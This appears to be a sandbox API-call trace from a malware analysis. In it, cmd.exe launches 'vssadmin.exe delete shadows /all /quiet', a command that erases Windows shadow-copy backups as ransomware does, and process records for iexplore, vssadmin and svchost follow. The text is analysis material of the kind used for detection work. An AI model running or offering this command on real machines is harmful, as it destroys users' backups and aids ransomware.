[0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a6ca420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a6ca3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a6ca3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a6ca360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a6ca700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a6b7b40, cchData=8 | out: lpLCData=".") returned 2 [0114.639] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a6ca4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.639] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.640] GetProcessHeap () returned 0x70000 [0114.640] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x0, Size=0x20c) returned 0x8b800 [0114.640] GetConsoleTitleW (in: lpConsoleTitle=0x8b800, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.641] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.641] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.641] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.641] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.641] GetProcessHeap () returned 0x70000 [0114.641] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x4012) returned 0x8cc60 [0114.641] GetProcessHeap () returned 0x70000 [0114.641] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8cc60 | out: hHeap=0x70000) returned 1 [0114.643] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77 [0114.643] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16 [0114.643] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16 [0114.643] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13 [0114.643] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13 [0114.643] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4 [0114.643] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4 [0114.643] GetProcessHeap () returned 0x70000 [0114.643] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0) returned 0x8ba20 [0114.643] GetProcessHeap () returned 0x70000 [0114.643] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x2a) returned 0x86440 [0114.644] GetProcessHeap () returned 0x70000 [0114.644] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x48) returned 0x8bae0 [0114.645] GetConsoleTitleW (in: lpConsoleTitle=0x30f870, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.646] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0114.646] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0114.646] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0114.646] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0114.646] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0114.646] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0114.646] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0114.646] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0114.646] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0114.646] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0114.646] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0114.646] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0114.646] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0114.646] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0114.646] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0114.646] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0114.646] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0114.646] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0114.646] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0114.646] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0114.646] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0114.647] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0114.647] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0114.647] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0114.647] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0114.647] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0114.647] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0114.647] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0114.647] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0114.647] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0114.647] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0114.647] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0114.647] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0114.647] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0114.647] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0114.647] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0114.647] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0114.647] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0114.647] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0114.647] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0114.647] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0114.647] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0114.647] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0114.647] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0114.647] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0114.647] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0114.647] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0114.647] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0114.648] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0114.648] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0114.648] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0114.648] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0114.648] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0114.648] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0114.648] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0114.648] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0114.648] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0114.648] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0114.648] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0114.648] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0114.648] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0114.648] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0114.648] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0114.648] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0114.648] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0114.648] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0114.648] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0114.648] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0114.648] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0114.648] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0114.648] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0114.648] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0114.648] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0114.648] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0114.648] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0114.649] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0114.649] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0114.649] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0114.649] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0114.649] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0114.649] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0114.649] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0114.649] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0114.649] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0114.649] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0114.649] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0114.649] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0114.649] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0114.650] GetProcessHeap () returned 0x70000 [0114.650] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x218) returned 0x8bb30 [0114.650] GetProcessHeap () returned 0x70000 [0114.650] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x62) returned 0x8bd50 [0114.650] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0114.650] GetProcessHeap () returned 0x70000 [0114.650] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x420) returned 0x71320 [0114.651] SetErrorMode (uMode=0x0) returned 0x0 [0114.651] SetErrorMode (uMode=0x1) returned 0x0 [0114.651] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x71330, lpFilePart=0x30f100 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f100*="Desktop") returned 0x25 [0114.651] SetErrorMode (uMode=0x0) returned 0x1 [0114.651] GetProcessHeap () returned 0x70000 [0114.651] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x71320, Size=0x76) returned 0x71320 [0114.651] GetProcessHeap () returned 0x70000 [0114.651] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x71320) returned 0x76 [0114.651] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.651] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.652] GetProcessHeap () returned 0x70000 [0114.652] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x128) returned 0x8bdc0 [0114.652] GetProcessHeap () returned 0x70000 [0114.652] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x240) returned 0x8bef0 [0114.659] GetProcessHeap () returned 0x70000 [0114.659] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8bef0, Size=0x12a) returned 0x8bef0 [0114.659] GetProcessHeap () returned 0x70000 [0114.659] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8bef0) returned 0x12a [0114.659] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a6af360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.659] GetProcessHeap () returned 0x70000 [0114.660] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xe8) returned 0x8c030 [0114.660] GetProcessHeap () returned 0x70000 [0114.660] RtlReAllocateHeap (Heap=0x70000, Flags=0x0, Ptr=0x8c030, Size=0x7e) returned 0x8c030 [0114.660] GetProcessHeap () returned 0x70000 [0114.660] RtlSizeHeap (HeapHandle=0x70000, Flags=0x0, MemoryPointer=0x8c030) returned 0x7e [0114.661] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.661] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x30ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ee70) returned 0xffffffffffffffff [0114.661] GetLastError () returned 0x2 [0114.661] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x30ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ee70) returned 0xffffffffffffffff [0114.661] GetLastError () returned 0x2 [0114.661] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x30ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ee70) returned 0xffffffffffffffff [0114.662] GetLastError () returned 0x2 [0114.662] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.662] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x30ee70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30ee70) returned 0x8c0c0 [0114.662] GetProcessHeap () returned 0x70000 [0114.662] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x0, Size=0x28) returned 0x845e0 [0114.662] FindClose (in: hFindFile=0x8c0c0 | out: hFindFile=0x8c0c0) returned 1 [0114.662] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0114.662] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0114.662] GetConsoleTitleW (in: lpConsoleTitle=0x30f3c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.662] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f178, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f138 | out: lpAttributeList=0x30f178, lpSize=0x30f138) returned 1 [0114.663] UpdateProcThreadAttribute (in: lpAttributeList=0x30f178, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f128, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f178, lpPreviousValue=0x0) returned 1 [0114.663] GetStartupInfoW (in: lpStartupInfo=0x30f290 | out: lpStartupInfo=0x30f290*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x33c, hStdError=0x0)) [0114.663] GetProcessHeap () returned 0x70000 [0114.663] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x20) returned 0x84610 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.663] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.664] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0115.717] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0115.717] GetProcessHeap () returned 0x70000 [0115.717] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x84610 | out: hHeap=0x70000) returned 1 [0115.718] GetProcessHeap () returned 0x70000 [0115.718] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0x12) returned 0x88900 [0115.718] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0115.722] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x30f1b0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f160 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x30f160*(hProcess=0x54, hThread=0x50, dwProcessId=0x568, dwThreadId=0x318)) returned 1 [0115.732] CloseHandle (hObject=0x50) returned 1 [0115.732] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.732] GetProcessHeap () returned 0x70000 [0115.732] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x8ac30 | out: hHeap=0x70000) returned 1 [0115.732] GetEnvironmentStringsW () returned 0x8ac30* [0115.732] GetProcessHeap () returned 0x70000 [0115.732] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xae8) returned 0x88a60 [0115.732] FreeEnvironmentStringsW (penv=0x8ac30) returned 1 [0115.732] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0127.232] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x30f0a8 | out: lpExitCode=0x30f0a8*=0x2) returned 1 [0127.232] CloseHandle (hObject=0x54) returned 1 [0127.232] _vsnwprintf (in: _Buffer=0x30f318, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f0b8 | out: _Buffer="00000002") returned 8 [0127.232] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0127.232] GetProcessHeap () returned 0x70000 [0127.232] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x88a60 | out: hHeap=0x70000) returned 1 [0127.233] GetEnvironmentStringsW () returned 0x8c0c0* [0127.233] GetProcessHeap () returned 0x70000 [0127.233] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0e) returned 0x88a60 [0127.233] FreeEnvironmentStringsW (penv=0x8c0c0) returned 1 [0127.233] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.233] GetProcessHeap () returned 0x70000 [0127.233] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x88a60 | out: hHeap=0x70000) returned 1 [0127.233] GetEnvironmentStringsW () returned 0x8c0c0* [0127.233] GetProcessHeap () returned 0x70000 [0127.233] RtlAllocateHeap (HeapHandle=0x70000, Flags=0x8, Size=0xb0e) returned 0x88a60 [0127.233] FreeEnvironmentStringsW (penv=0x8c0c0) returned 1 [0127.233] GetProcessHeap () returned 0x70000 [0127.233] HeapFree (in: hHeap=0x70000, dwFlags=0x0, lpMem=0x88900 | out: hHeap=0x70000) returned 1 [0127.233] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f178 | out: lpAttributeList=0x30f178) [0127.233] _get_osfhandle (_FileHandle=1) returned 0x33c [0127.233] SetConsoleMode (hConsoleHandle=0x33c, dwMode=0x0) returned 0 [0127.234] _get_osfhandle (_FileHandle=1) returned 0x33c [0127.234] GetConsoleMode (in: hConsoleHandle=0x33c, lpMode=0x4a6ae194 | out: lpMode=0x4a6ae194) returned 0 [0127.234] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0127.234] GetConsoleMode (in: hConsoleHandle=0xfffffffffffffffe, lpMode=0x4a6ae198 | out: lpMode=0x4a6ae198) returned 1 [0127.235] _get_osfhandle (_FileHandle=0) returned 0xfffffffffffffffe [0127.235] SetConsoleMode (hConsoleHandle=0xfffffffffffffffe, dwMode=0x7) returned 0 [0127.235] SetConsoleInputExeNameW () returned 0x1 [0127.235] GetConsoleOutputCP () returned 0x1b5 [0127.235] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a6bbfe0 | out: lpCPInfo=0x4a6bbfe0) returned 1 [0127.235] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0127.236] exit (_Code=2) Process: id = "9" image_name = "iexplore.exe" filename = "c:\\program files (x86)\\internet explorer\\iexplore.exe" page_root = "0x6eacd000" os_pid = "0xb30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x7a4" cmd_line = "\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\" -nohome" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x3d4 Thread: id = 39 os_tid = 0x604 Thread: id = 40 os_tid = 0x2c4 Thread: id = 41 os_tid = 0x180 Thread: id = 42 os_tid = 0x76c Thread: id = 43 os_tid = 0x518 Thread: id = 57 os_tid = 0x754 Thread: id = 58 os_tid = 0x824 Thread: id = 59 os_tid = 0x814 Thread: id = 60 os_tid = 0x984 Thread: id = 61 os_tid = 0xbc4 Thread: id = 62 os_tid = 0xbc0 Thread: id = 63 os_tid = 0xb60 Thread: id = 64 os_tid = 0x344 Thread: id = 67 os_tid = 0x8e4 Thread: id = 68 os_tid = 0x914 Thread: id = 69 os_tid = 0x8c4 Thread: id = 83 os_tid = 0x728 Thread: id = 120 os_tid = 0xb20 Thread: id = 123 os_tid = 0xd4 Process: id = "10" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x6e24a000" os_pid = "0x568" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xb24" cmd_line = "vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 33 os_tid = 0x318 Thread: id = 34 os_tid = 0x570 Thread: id = 35 os_tid = 0xa34 Thread: id = 36 os_tid = 0xbd4 Thread: id = 37 os_tid = 0x54c Process: id = "11" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x972d000" os_pid = "0xc8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dde1" [0xc000000f], "LOCAL" [0x7] Thread: id = 44 os_tid = 0x6c0 Thread: id = 45 os_tid = 0xae0 Thread: id = 46 os_tid = 0x768 Thread: id = 47 os_tid = 0x764 Thread: id = 48 os_tid = 0x724 Thread: id = 49 os_tid = 0x718 Thread: id = 50 os_tid = 0x714 Thread: id = 51 os_tid = 0x630 Thread: id = 52 os_tid = 0x154 Thread: id = 53 os_tid = 0x150 Thread: id = 54 os_tid = 0x120 Thread: id = 55 os_tid = 